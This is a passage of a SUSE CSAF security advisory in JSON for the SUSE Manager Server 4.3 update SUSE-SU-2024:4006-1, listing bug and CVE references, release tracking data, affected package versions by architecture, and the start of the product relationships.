"summary": "SUSE Bug 1226090",
"url": "https://bugzilla.suse.com/1226090"
},
{
"category": "self",
"summary": "SUSE Bug 1226439",
"url": "https://bugzilla.suse.com/1226439"
},
{
"category": "self",
"summary": "SUSE Bug 1226461",
"url": "https://bugzilla.suse.com/1226461"
},
{
"category": "self",
"summary": "SUSE Bug 1226478",
"url": "https://bugzilla.suse.com/1226478"
},
{
"category": "self",
"summary": "SUSE Bug 1226687",
"url": "https://bugzilla.suse.com/1226687"
},
{
"category": "self",
"summary": "SUSE Bug 1226917",
"url": "https://bugzilla.suse.com/1226917"
},
{
"category": "self",
"summary": "SUSE Bug 1227133",
"url": "https://bugzilla.suse.com/1227133"
},
{
"category": "self",
"summary": "SUSE Bug 1227334",
"url": "https://bugzilla.suse.com/1227334"
},
{
"category": "self",
"summary": "SUSE Bug 1227406",
"url": "https://bugzilla.suse.com/1227406"
},
{
"category": "self",
"summary": "SUSE Bug 1227526",
"url": "https://bugzilla.suse.com/1227526"
},
{
"category": "self",
"summary": "SUSE Bug 1227543",
"url": "https://bugzilla.suse.com/1227543"
},
{
"category": "self",
"summary": "SUSE Bug 1227599",
"url": "https://bugzilla.suse.com/1227599"
},
{
"category": "self",
"summary": "SUSE Bug 1227606",
"url": "https://bugzilla.suse.com/1227606"
},
{
"category": "self",
"summary": "SUSE Bug 1227746",
"url": "https://bugzilla.suse.com/1227746"
},
{
"category": "self",
"summary": "SUSE Bug 1228036",
"url": "https://bugzilla.suse.com/1228036"
},
{
"category": "self",
"summary": "SUSE Bug 1228101",
"url": "https://bugzilla.suse.com/1228101"
},
{
"category": "self",
"summary": "SUSE Bug 1228130",
"url": "https://bugzilla.suse.com/1228130"
},
{
"category": "self",
"summary": "SUSE Bug 1228147",
"url": "https://bugzilla.suse.com/1228147"
},
{
"category": "self",
"summary": "SUSE Bug 1228286",
"url": "https://bugzilla.suse.com/1228286"
},
{
"category": "self",
"summary": "SUSE Bug 1228326",
"url": "https://bugzilla.suse.com/1228326"
},
{
"category": "self",
"summary": "SUSE Bug 1228345",
"url": "https://bugzilla.suse.com/1228345"
},
{
"category": "self",
"summary": "SUSE Bug 1228412",
"url": "https://bugzilla.suse.com/1228412"
},
{
"category": "self",
"summary": "SUSE Bug 1228545",
"url": "https://bugzilla.suse.com/1228545"
},
{
"category": "self",
"summary": "SUSE Bug 1228638",
"url": "https://bugzilla.suse.com/1228638"
},
{
"category": "self",
"summary": "SUSE Bug 1228851",
"url": "https://bugzilla.suse.com/1228851"
},
{
"category": "self",
"summary": "SUSE Bug 1228945",
"url": "https://bugzilla.suse.com/1228945"
},
{
"category": "self",
"summary": "SUSE Bug 1229079",
"url": "https://bugzilla.suse.com/1229079"
},
{
"category": "self",
"summary": "SUSE Bug 1229178",
"url": "https://bugzilla.suse.com/1229178"
},
{
"category": "self",
"summary": "SUSE Bug 1229260",
"url": "https://bugzilla.suse.com/1229260"
},
{
"category": "self",
"summary": "SUSE Bug 1229339",
"url": "https://bugzilla.suse.com/1229339"
},
{
"category": "self",
"summary": "SUSE Bug 1231332",
"url": "https://bugzilla.suse.com/1231332"
},
{
"category": "self",
"summary": "SUSE Bug 1231852",
"url": "https://bugzilla.suse.com/1231852"
},
{
"category": "self",
"summary": "SUSE Bug 1231900",
"url": "https://bugzilla.suse.com/1231900"
},
{
"category": "self",
"summary": "SUSE Bug 1231922",
"url": "https://bugzilla.suse.com/1231922"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-47533 page",
"url": "https://www.suse.com/security/cve/CVE-2024-47533/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-49502 page",
"url": "https://www.suse.com/security/cve/CVE-2024-49502/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-49503 page",
"url": "https://www.suse.com/security/cve/CVE-2024-49503/"
}
],
"title": "Security update for SUSE Manager Server 4.3",
"tracking": {
"current_release_date": "2024-11-18T13:19:53Z",
"generator": {
"date": "2024-11-18T13:19:53Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2024:4006-1",
"initial_release_date": "2024-11-18T13:19:53Z",
"revision_history": [
{
"date": "2024-11-18T13:19:53Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "inter-server-sync-0.3.5-150400.3.36.13.aarch64",
"product": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.aarch64",
"product_id": "inter-server-sync-0.3.5-150400.3.36.13.aarch64"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64",
"product": {
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64",
"product_id": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64",
"product": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64",
"product_id": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.aarch64"
}
},
{
"category": "product_version",
"name": "susemanager-4.3.39-150400.3.58.5.aarch64",
"product": {
"name": "susemanager-4.3.39-150400.3.58.5.aarch64",
"product_id": "susemanager-4.3.39-150400.3.58.5.aarch64"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.3.39-150400.3.58.5.aarch64",
"product": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.aarch64",
"product_id": "susemanager-tools-4.3.39-150400.3.58.5.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "cobbler-3.3.3-150400.5.52.3.noarch",
"product": {
"name": "cobbler-3.3.3-150400.5.52.3.noarch",
"product_id": "cobbler-3.3.3-150400.5.52.3.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-3.3.3-150400.5.52.3.noarch",
"product": {
"name": "cobbler-tests-3.3.3-150400.5.52.3.noarch",
"product_id": "cobbler-tests-3.3.3-150400.5.52.3.noarch"
}
},
{
"category": "product_version",
"name": "cobbler-tests-containers-3.3.3-150400.5.52.3.noarch",
"product": {
"name": "cobbler-tests-containers-3.3.3-150400.5.52.3.noarch",
"product_id": "cobbler-tests-containers-3.3.3-150400.5.52.3.noarch"
}
},
{
"category": "product_version",
"name": "grafana-formula-0.11.0-150400.3.21.4.noarch",
"product": {
"name": "grafana-formula-0.11.0-150400.3.21.4.noarch",
"product_id": "grafana-formula-0.11.0-150400.3.21.4.noarch"
}
},
{
"category": "product_version",
"name": "mgr-daemon-4.3.11-150400.3.21.6.noarch",
"product": {
"name": "mgr-daemon-4.3.11-150400.3.21.6.noarch",
"product_id": "mgr-daemon-4.3.11-150400.3.21.6.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"product": {
"name": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"product_id": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"product_id": "python3-spacewalk-check-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"product_id": "python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"product_id": "python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"product": {
"name": "saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"product_id": "saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-4.3.29-150400.3.42.8.noarch",
"product": {
"name": "spacecmd-4.3.29-150400.3.42.8.noarch",
"product_id": "spacecmd-4.3.29-150400.3.42.8.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-app-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-cdn-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-cdn-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-cdn-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-server-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"product": {
"name": "spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"product_id": "spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-base-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-base-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"product": {
"name": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"product_id": "spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-check-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "spacewalk-check-4.3.21-150400.3.33.11.noarch",
"product_id": "spacewalk-check-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"product_id": "spacewalk-client-setup-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"product": {
"name": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"product_id": "spacewalk-client-tools-4.3.21-150400.3.33.11.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-config-4.3.14-150400.3.18.6.noarch",
"product": {
"name": "spacewalk-config-4.3.14-150400.3.18.6.noarch",
"product_id": "spacewalk-config-4.3.14-150400.3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-dobby-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-dobby-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-dobby-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-html-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-html-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-html-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-html-debug-4.3.42-150400.3.52.1.noarch",
"product": {
"name": "spacewalk-html-debug-4.3.42-150400.3.52.1.noarch",
"product_id": "spacewalk-html-debug-4.3.42-150400.3.52.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-java-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-java-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-apidoc-sources-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-java-apidoc-sources-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-java-apidoc-sources-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-java-config-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-java-lib-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"product": {
"name": "spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"product_id": "spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"product": {
"name": "spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"product_id": "spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"product": {
"name": "spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"product_id": "spacewalk-utils-4.3.22-150400.3.29.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"product": {
"name": "spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"product_id": "spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"product": {
"name": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"product_id": "susemanager-build-keys-15.4.10-150400.3.29.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"product": {
"name": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"product_id": "susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"product": {
"name": "susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"product_id": "susemanager-docs_en-4.3.14-150400.9.66.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"product": {
"name": "susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"product_id": "susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-4.3.27-150400.3.45.11.noarch",
"product": {
"name": "susemanager-schema-4.3.27-150400.3.45.11.noarch",
"product_id": "susemanager-schema-4.3.27-150400.3.45.11.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-sanity-4.3.27-150400.3.45.11.noarch",
"product": {
"name": "susemanager-schema-sanity-4.3.27-150400.3.45.11.noarch",
"product_id": "susemanager-schema-sanity-4.3.27-150400.3.45.11.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"product": {
"name": "susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"product_id": "susemanager-schema-utility-4.3.27-150400.3.45.11.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-sls-4.3.45-150400.3.55.4.noarch",
"product": {
"name": "susemanager-sls-4.3.45-150400.3.55.4.noarch",
"product_id": "susemanager-sls-4.3.45-150400.3.55.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"product": {
"name": "susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"product_id": "susemanager-sync-data-4.3.21-150400.3.35.2.noarch"
}
},
{
"category": "product_version",
"name": "uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"product": {
"name": "uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"product_id": "uyuni-config-modules-4.3.45-150400.3.55.4.noarch"
}
},
{
"category": "product_version",
"name": "uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch",
"product": {
"name": "uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch",
"product_id": "uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
}
},
{
"category": "product_version",
"name": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"product": {
"name": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"product_id": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"product": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"product_id": "inter-server-sync-0.3.5-150400.3.36.13.ppc64le"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"product": {
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"product_id": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"product": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"product_id": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le"
}
},
{
"category": "product_version",
"name": "susemanager-4.3.39-150400.3.58.5.ppc64le",
"product": {
"name": "susemanager-4.3.39-150400.3.58.5.ppc64le",
"product_id": "susemanager-4.3.39-150400.3.58.5.ppc64le"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"product": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"product_id": "susemanager-tools-4.3.39-150400.3.58.5.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "inter-server-sync-0.3.5-150400.3.36.13.s390x",
"product": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.s390x",
"product_id": "inter-server-sync-0.3.5-150400.3.36.13.s390x"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"product": {
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"product_id": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.s390x"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"product": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"product_id": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-4.3.39-150400.3.58.5.s390x",
"product": {
"name": "susemanager-4.3.39-150400.3.58.5.s390x",
"product_id": "susemanager-4.3.39-150400.3.58.5.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.3.39-150400.3.58.5.s390x",
"product": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.s390x",
"product_id": "susemanager-tools-4.3.39-150400.3.58.5.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"product": {
"name": "inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"product_id": "inter-server-sync-0.3.5-150400.3.36.13.x86_64"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"product": {
"name": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"product_id": "python2-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"product": {
"name": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"product_id": "python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64"
}
},
{
"category": "product_version",
"name": "susemanager-4.3.39-150400.3.58.5.x86_64",
"product": {
"name": "susemanager-4.3.39-150400.3.58.5.x86_64",
"product_id": "susemanager-4.3.39-150400.3.58.5.x86_64"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"product": {
"name": "susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"product_id": "susemanager-tools-4.3.39-150400.3.58.5.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 15",
"product": {
"name": "SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15"
}
},
{
"category": "product_name",
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product": {
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-manager-tools-micro:5"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Proxy Module 4.3",
"product": {
"name": "SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server Module 4.3",
"product": {
"name": "SUSE Manager Server Module 4.3",
"product_id": "SUSE Manager Server Module 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-suse-manager-server:4.3"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch"
},
"product_reference": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch"
},
"product_reference": "uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgr-daemon-4.3.11-150400.3.21.6.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch"
},
"product_reference": "mgr-daemon-4.3.11-150400.3.21.6.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch"
},
"product_reference": "python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-check-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch as component of SUSE Manager Proxy Module 4.3",
"product_id": "SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch"
},
"product_reference": "python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
